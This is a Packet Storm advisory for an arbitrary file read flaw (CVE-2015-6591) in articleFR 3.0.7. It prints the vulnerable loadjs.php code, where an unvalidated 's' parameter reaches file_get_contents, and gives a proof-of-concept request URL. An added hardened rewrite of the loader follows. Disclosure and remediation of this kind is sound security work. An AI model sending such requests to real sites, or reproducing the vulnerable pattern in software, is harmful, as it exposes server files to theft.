articleFR 3.0.7 Arbitrary File Read

2015-10-26T00:00:00
ID PACKETSTORM:134081
Type packetstorm
Reporter cfreer
Modified 2015-10-26T00:00:00

Description

                                        
`# Exploit Title: articleFR arbitrary file read vulnerability in v3.0.7  
# Date: 2015-09-06  
# Vendor: Free Reprintables  
# Exploit Author: cfreer & 0keeTeam  
# Product web page: http://www.freereprintables.com  
# Version: 3.0.7  
# CVE : CVE-2015-6591  
  
  
Details of the vulnerability are as follows:  
  
Affected version: Version 3.0.7 and before.  
Discovery date: 2015/9/6  
Tested on: Apache/2.4.7 (Win32)  
===================================================  
  
The vulnerable parameter is 's' (in  
articleFR\application\templates\amelia\loadjs.php). The value of 's' is  
passed directly to file_get_contents() without any validation.  
  
<?  
header('Content-Type: application/javascript');  
$_content = file_get_contents($_GET['s']);  
$_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'],  
$_content);  
print $_content;  
exit;  
?>  
  
  
  
Proof of Concept:  
=================================================================================================  
  
http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php  
  
=================================================================================================  
  
  
Reference: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591  
`
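
A hardened form of the loadjs.php loader shown in the advisory, as an added example (not code from the advisory or from the articleFR project). It assumes the template's scripts live in a `js` subdirectory; `JS_DIR`, `resolve_script` and `render_script` are hypothetical names, and the caller-supplied regex is swapped for a literal, case-insensitive substitution.

```php
<?php
declare(strict_types=1);

// Assumption: the only files this endpoint should ever serve live here.
const JS_DIR = __DIR__ . '/js';

/** Map a requested script name to a real file inside $baseDir, or null. */
function resolve_script(string $name, string $baseDir): ?string
{
    // Bare file name only: no path separators, no stream wrappers, must end in .js
    if (!preg_match('/\A[A-Za-z0-9._-]+\.js\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment check after symlinks are resolved.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

/** Return the script body with 'h' replaced by 'r', or null if refused. */
function render_script(array $query, string $baseDir): ?string
{
    $name = $query['s'] ?? '';
    if (!is_string($name) || ($path = resolve_script($name, $baseDir)) === null) {
        return null;
    }
    $content = file_get_contents($path);
    if ($content === false) {
        return null;
    }
    $h = $query['h'] ?? '';
    $r = $query['r'] ?? '';
    if (is_string($h) && $h !== '' && is_string($r)) {
        // Literal substitution: the request never supplies a regex pattern.
        $content = str_ireplace($h, $r, $content);
    }
    return $content;
}

$out = render_script($_GET, JS_DIR);
if ($out === null) {
    http_response_code(404);   // same response for "invalid name" and "not found"
    exit;
}
header('Content-Type: application/javascript');
header('X-Content-Type-Options: nosniff');
print $out;
```

With this check the request from the proof of concept (`s=loadjs.php`) is refused, because the name does not end in `.js` and does not resolve inside the script directory.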